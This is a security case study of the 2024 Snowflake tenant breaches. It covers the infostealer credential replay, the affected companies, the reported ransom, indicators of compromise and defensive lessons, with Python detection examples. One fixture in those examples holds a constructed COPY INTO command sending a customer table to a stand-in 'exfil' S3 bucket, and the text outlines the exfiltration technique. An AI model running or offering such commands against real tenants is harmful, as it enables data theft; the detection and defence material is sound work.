Decipher File · May 2024 to August 2024
Snowflake Breaches 2024: Ticketmaster, AT&T, Santander Hit via Customer-Side Credentials
The 2024 Snowflake customer breaches are the cybersecurity case study that proved cloud data warehouse security depends on customer-side identity hygiene, not vendor controls. Between May and August 2024, threat group UNC5537 used credentials stolen by infostealer malware on customer endpoints to access Snowflake tenants that lacked MFA. Mandiant attributed at least 165 victim notifications, including Ticketmaster, AT&T, Santander, Advance Auto Parts, Pure Storage, and Neiman Marcus. AT&T disclosed paying approximately $370,000 in ransom.
Incident summary
Snowflake is the cloud data warehouse used by thousands of enterprises to centralize analytics data. Tenants typically hold customer records, billing data, telemetry, and partner data, often the most sensitive structured data an organization owns. In 2024, threat group UNC5537 (Mandiant designation) ran a credential-replay campaign against Snowflake customer tenants. Per Mandiant's June 10, 2024 advisory, the campaign reached at least 165 customer tenants between May and August 2024 and produced public breach disclosures from Ticketmaster, AT&T, Santander, Advance Auto Parts, Pure Storage, Neiman Marcus, Lending Tree, Anheuser-Busch, and others.
The root cause was not a Snowflake platform vulnerability. Per Snowflake CISO Brad Jones' joint statement with Mandiant and CrowdStrike on June 2, 2024, the threat actor used valid customer credentials obtained from infostealer malware logs (LUMMA, RACOON, REDLINE, VIDAR) on contractor and developer endpoints, some dating to 2020. The compromised Snowflake user accounts did not have multi-factor authentication enforced. Snowflake's authentication model at the time defaulted to single-factor and required tenant admins to opt in to MFA.
Ticketmaster's parent company Live Nation disclosed in a May 31, 2024 SEC Form 8-K that approximately 560 million customer records were exfiltrated. AT&T disclosed on July 12, 2024 that call detail records for nearly all wireless customers between May 2022 and October 2022 plus a portion of January 2023 had been exfiltrated. Per Wired's July 14 reporting, AT&T paid the threat actor approximately $370,000 in Bitcoin to delete the stolen data.
Attack technique
MITRE ATT&CK maps the campaign primarily to T1078.004 (Valid Accounts: Cloud Accounts), with T1555.003 (Credentials from Password Stores: Credentials from Web Browsers) and T1539 (Steal Web Session Cookie) covering the upstream infostealer collection, and T1567.002 (Exfiltration Over Web Service: Exfiltration to Cloud Storage) covering the bulk-unload behavior. The technique chain is straightforward: harvest credentials from victim endpoints via commodity infostealer malware, identify Snowflake URLs in the harvested credential logs, attempt login at scale against tenants without MFA, and exfiltrate data via Snowflake's own COPY INTO command to attacker-controlled S3 buckets.
Per Mandiant, UNC5537 used a custom utility variously named rapeflake or FROSTBITE for Snowflake-specific reconnaissance. The utility enumerated databases, schemas, and tables, queried row counts to identify high-value targets, and staged the COPY INTO commands. The actor staged exfiltration to external S3 buckets via Snowflake's own data unloading mechanism, which made the egress look like a normal Snowflake operation from the platform's perspective.
Infostealer marketplaces are the structural enabler. Per multiple Mandiant and CrowdStrike reports, credentials harvested by LUMMA, RACOON, REDLINE, and VIDAR are sold in bulk on Telegram channels and Russian-language forums for $10 to $100 per log depending on the targeted victim. The Snowflake campaign demonstrates how a non-glamorous commodity malware marketplace produces nation-state-grade outcomes when combined with SaaS tenants that do not enforce MFA. The campaign produced no zero-day, no novel malware, no advanced TTPs — only credential reuse against unenforced controls.
Snowflake responded operationally with the June 7, 2024 release of a network policy feature that lets tenant admins enforce IP allowlisting for user authentication and the July 17, 2024 announcement of mandatory MFA for human user accounts in new Snowflake editions. Snowflake also enabled tenant-level alerts for anomalous data egress and improved its CISO portal incident communications. Snowflake's stock traded down approximately 6 percent on June 3, 2024 after the initial customer notifications became public.
Impact and consequences
The Ticketmaster breach is the largest publicly disclosed by record count. Per Live Nation's May 31, 2024 SEC Form 8-K and follow-up notifications, approximately 560 million customer records were exfiltrated, including names, addresses, email addresses, partial payment card data, and order history. ShinyHunters posted the dataset for sale at $500,000 on BreachForums on May 27, 2024. Multiple class-action lawsuits followed in US federal court.
AT&T's disclosure was the most operationally damaging by data sensitivity. Per the July 12, 2024 8-K, the breach exposed call detail records (CDRs) including the phone numbers called and call duration for nearly all AT&T wireless customers during the affected window. The records did not include call content or SMS message text. Wired reported on July 14, 2024 that AT&T paid the threat actor approximately $370,000 in Bitcoin to delete the stolen data, a payment routed through ShinyHunters intermediary John Erin Binns. The FBI was involved in the negotiation.
Santander's May 14, 2024 disclosure covered approximately 30 million customers and employees in Spain, Chile, and Uruguay. Advance Auto Parts disclosed approximately 2.3 million current and former employee records affected. Pure Storage confirmed the compromise of a workspace within its Snowflake tenant but reported that the affected workspace contained only telemetry, not customer data. Neiman Marcus disclosed approximately 31 million customer records affected.
The regulatory consequences for Snowflake itself were limited because the root cause was customer-side credential hygiene, not a Snowflake platform vulnerability. The reputational consequence was more meaningful. Snowflake's shared-responsibility position — that customers are responsible for their own credential hygiene and MFA enforcement — was widely critiqued in trade press as failing the test of secure defaults. Snowflake's commitment to mandatory MFA for new tenants in July 2024 was a direct response to that critique. The campaign also accelerated Salesforce, Microsoft, and Workday efforts to flip their authentication defaults from opt-in MFA to default-on MFA across their respective platforms through late 2024 and into 2025.
Indicators of Compromise
These are the specific artifacts defenders should hunt for. Cross-reference them against your existing detection rules before acting on them.
- Tenant access from infostealer-associated IP infrastructure, including the residential proxy ranges flagged by Mandiant in the June 10, 2024 advisory
- Use of the rapeflake utility (also tracked as FROSTBITE) for Snowflake reconnaissance and data staging
- Account login by user identities present in LUMMA, RACOON, and REDLINE infostealer logs from 2020 onward
- Bulk COPY INTO or unloading queries to external stages on S3 buckets owned by the attacker
- Absence of multi-factor authentication on the compromised Snowflake user accounts
- Original credential capture from contractor and developer endpoints, not from production Snowflake admin endpoints
- Tenant access patterns consistent with brute-force attempts plus valid-credential reuse across 165+ tenants in the same campaign window
Lessons for defenders
Treat shared-responsibility lines on SaaS platforms as defaults you have to override. Snowflake's pre-July 2024 default was single-factor authentication unless the tenant admin enabled MFA. That default produced the breach. Every SaaS platform you depend on has a similar set of opt-in security controls. Audit them. Enable MFA, IP allowlisting, session timeouts, and anomaly alerting on every tenant. Document those settings in your tenant baseline configuration the same way you document Active Directory baselines.
Infostealer logs are now a tier-one threat intelligence source. Mature security teams subscribe to infostealer log monitoring services that match your domains and email addresses against credentials posted on Telegram and Russian-language forums. If your domains appear in fresh logs, treat it as a credential compromise on the listed user and force a password reset plus MFA re-enrollment immediately, regardless of whether the user has logged in from the suspicious endpoint.
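The matching step described above, as an added example that is not code from Mandiant, Snowflake or the page: it parses a constructed feed of stealer-log lines in the common `url:username:password` shape (an assumption about the feed format), keeps only entries tied to your own identity domains or your own SaaS tenant hosts, discards the password field, and flags which of those sit on high-value SaaS so the reset and MFA re-enrolment can be prioritised.

```python
# Added example, not code from the page's sources. Assumes a stealer-log feed in
# the common "url:username:password" line format with no port in the URL;
# every line, identity and host below is constructed.
SAMPLE_LOG_LINES = [
    "https://ab12345.us-east-1.snowflakecomputing.com/console/login:svc_etl@example.com:<pw1>",
    "https://mail.example.com/owa:jdoe@example.com:<pw2>",
    "https://ab12345.us-east-1.snowflakecomputing.com/:contractor1@partner.test:<pw3>",
    "android://com.bank.app/:someone@unrelated.test:<pw4>",
    "not a credential line",
]
MY_DOMAINS = {"example.com"}                                    # identities you own
MY_TENANT_HOSTS = {"ab12345.us-east-1.snowflakecomputing.com"}  # SaaS tenants you own
WATCHED_SAAS_SUFFIXES = (".snowflakecomputing.com",)            # high-value SaaS

def parse_line(line):
    """Split 'scheme://host/path:user:password' into (host, user); None if malformed.
    The password field is discarded, never stored or returned."""
    if "://" not in line:
        return None
    _scheme, rest = line.split("://", 1)
    parts = rest.split(":", 2)
    if len(parts) != 3:
        return None
    hostpath, user, _password = parts
    return hostpath.split("/", 1)[0].lower(), user.strip().lower()

def match_exposed_accounts(lines, my_domains, my_tenant_hosts, watched_suffixes):
    """Return entries tied to your identities or tenants: the users to force a
    password reset and MFA re-enrolment on, per the lesson above."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        host, user = parsed
        reasons = []
        if "@" in user and user.rsplit("@", 1)[1] in my_domains:
            reasons.append("own identity domain")
        if host in my_tenant_hosts:
            reasons.append("own SaaS tenant host")
        if reasons:
            findings.append({"user": user, "host": host, "reasons": reasons,
                             "high_value_saas": host.endswith(watched_suffixes)})
    return findings
```

Note that the contractor identity on a partner domain is still caught because the tenant host is yours, which is the contractor-endpoint case the page describes.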
Endpoint controls on contractor and developer machines determine your SaaS perimeter. Per Mandiant, several of the compromised Snowflake credentials originated on contractor or personal endpoints that were not managed by the victim organization's EDR. Bring-your-own-device or unmanaged contractor laptop access to high-value SaaS tenants is the structural risk. Enforce managed-device-only access to sensitive SaaS through conditional access policies tied to device posture, or terminate the access path.
Egress controls on data warehouses are a primary control, not a secondary one. The UNC5537 campaign used Snowflake's own COPY INTO command to exfiltrate data to attacker-controlled S3 buckets. Tenant-level controls that restrict data unloading to specific allowlisted external stages defeat that exfiltration path. Configure those controls before you need them. Snowflake's network policy and external stage allowlist are the specific features to enable.
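As an added example covering both the indicators listed above and the egress lesson here (not code from Snowflake, Mandiant or the page), the detection below correlates unload queries with the session that ran them: any `COPY INTO` whose destination is not an allowlisted external stage or location is flagged, and the finding records whether the most recent login behind it had no second factor. Record shapes are modelled on the column names of Snowflake's `ACCOUNT_USAGE.LOGIN_HISTORY` and `QUERY_HISTORY` views (an assumption about how you export them); all rows are constructed.

```python
import re

# Added example, not code from Snowflake, Mandiant or the page. Record shapes are
# modelled on ACCOUNT_USAGE.LOGIN_HISTORY / QUERY_HISTORY; every row is constructed.
LOGINS = [
    {"user": "svc_contractor", "ts": "2024-05-20T02:11:00", "ip": "203.0.113.45",
     "second_factor": None, "success": True},          # password only, no MFA
    {"user": "analyst_jane", "ts": "2024-05-20T09:02:00", "ip": "198.51.100.7",
     "second_factor": "DUO_PUSH", "success": True},
]
QUERIES = [
    {"user": "svc_contractor", "ts": "2024-05-20T02:15:00",
     "text": "COPY INTO 's3://example-exfil-bucket/dump/' FROM billing.public.customers"},
    {"user": "analyst_jane", "ts": "2024-05-20T09:30:00",
     "text": "COPY INTO @reports_stage/daily FROM analytics.public.summary"},
]
# Destinations unloads may legitimately reach (your approved stages / locations).
ALLOWED_UNLOAD_PREFIXES = ("@reports_stage", "s3://corp-approved-exports/")

# Unload syntax is COPY INTO <@stage | 'cloud-url'> FROM <table|query>; a load
# (COPY INTO <table> FROM @stage) has a bare table name as target and is not matched.
UNLOAD_RE = re.compile(r"^\s*COPY\s+INTO\s+('[^']+'|@\S+)", re.IGNORECASE)

def unload_target(query_text):
    """Return the unload destination of a COPY INTO query, or None for non-unloads."""
    m = UNLOAD_RE.match(query_text)
    return m.group(1).strip("'") if m else None

def latest_login_before(logins, user, ts):
    """Most recent successful login by `user` at or before ISO timestamp `ts`."""
    prior = [l for l in logins if l["user"] == user and l["success"] and l["ts"] <= ts]
    return max(prior, key=lambda l: l["ts"]) if prior else None

def find_suspicious_unloads(logins, queries, allowed_prefixes):
    """Flag unloads to non-allowlisted destinations; note sessions without MFA."""
    findings = []
    for q in sorted(queries, key=lambda row: row["ts"]):
        target = unload_target(q["text"])
        if target is None or target.startswith(allowed_prefixes):
            continue
        reasons = ["unload target not in external stage allowlist"]
        login = latest_login_before(logins, q["user"], q["ts"])
        if login is None:
            reasons.append("no matching successful login")
        elif not login["second_factor"]:
            reasons.append("session authenticated without MFA")
        findings.append({"user": q["user"], "ts": q["ts"], "target": target,
                         "client_ip": login["ip"] if login else None, "reasons": reasons})
    return findings
```

The allowlist check is the detection counterpart of the tenant-level unload restriction the paragraph recommends; running both means a misconfigured stage still surfaces in review even if the control was not yet enforced.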
Frequently asked questions
Who was behind the 2024 Snowflake customer breaches?
Per Mandiant's June 10, 2024 advisory, the campaign was operated by a threat group tracked as UNC5537. The group used credentials harvested from commodity infostealer malware (LUMMA, RACOON, REDLINE, VIDAR) on customer endpoints, some dating back to 2020. ShinyHunters served as an intermediary for stolen data sales on BreachForums. The campaign produced no zero-day exploit. The structural enabler was tenant-level absence of MFA.
Was Snowflake itself breached in 2024?
No. Per Snowflake CISO Brad Jones' June 2, 2024 joint statement with Mandiant and CrowdStrike, no Snowflake platform vulnerability was identified or exploited. The campaign used valid customer credentials against customer tenants that did not have MFA enforced. The root cause sat on the customer side of the shared responsibility line. Snowflake responded with mandatory MFA defaults for new tenants in July 2024.
What did Ticketmaster lose in the 2024 Snowflake breach?
Per Live Nation Entertainment's May 31, 2024 SEC Form 8-K filing, approximately 560 million customer records were exfiltrated, including names, addresses, email addresses, partial payment card data, and order history. ShinyHunters posted the dataset for sale at $500,000 on BreachForums on May 27, 2024. Multiple class-action lawsuits followed in US federal court.
Did AT&T pay a ransom in the Snowflake-linked breach?
Yes. Per Wired's July 14, 2024 reporting and corroborating reporting in 404 Media, AT&T paid the threat actor approximately $370,000 in Bitcoin to delete the stolen call detail records dataset. The payment was routed through ShinyHunters intermediary John Erin Binns. The FBI was involved in the negotiation. AT&T's July 12, 2024 SEC Form 8-K disclosure confirmed the breach and the affected data scope but did not disclose the ransom payment.
What data did AT&T lose in the Snowflake breach?
Per AT&T's July 12, 2024 SEC disclosure, call detail records for nearly all AT&T wireless customers between May 2022 and October 2022, plus a portion of January 2023, were exfiltrated. The records included the phone numbers called and call duration but did not include call content or SMS message text. The records did include enough metadata to map social and professional networks of AT&T customers, which raised concerns for journalists, officials, and other sensitive populations.
How can defenders prevent a Snowflake-style SaaS credential breach?
Enforce mandatory MFA on every SaaS tenant. Enable IP allowlisting and conditional access policies that restrict access to managed devices. Subscribe to infostealer log monitoring and force credential rotation when domains appear in fresh logs. Configure data egress controls (external stage allowlists in Snowflake's case) before they are needed. Treat unmanaged contractor and BYOD access to high-value SaaS as a structural risk, not a procurement convenience.
Sources
- Mandiant: UNC5537 Targets Snowflake Customer Instances · Mandiant's June 10, 2024 advisory with attribution, technique chain, and victim count
- Snowflake: Detecting and Preventing Unauthorized User Access · Snowflake CISO Brad Jones' joint statement with Mandiant and CrowdStrike on the campaign
- AT&T Form 8-K (July 12, 2024) · AT&T SEC disclosure of the call-detail-records breach attributed to the Snowflake campaign
- CISA Alert: Snowflake Customer Account Targeting · CISA's June 3, 2024 alert echoing Snowflake guidance on MFA and network policies
- Ticketmaster Parent Live Nation Form 8-K (May 31, 2024) · Live Nation SEC disclosure of the Ticketmaster customer database breach
- Wired: AT&T Paid a Hacker $370,000 to Delete Stolen Phone Records · Wired's July 14, 2024 reporting on the AT&T ransom payment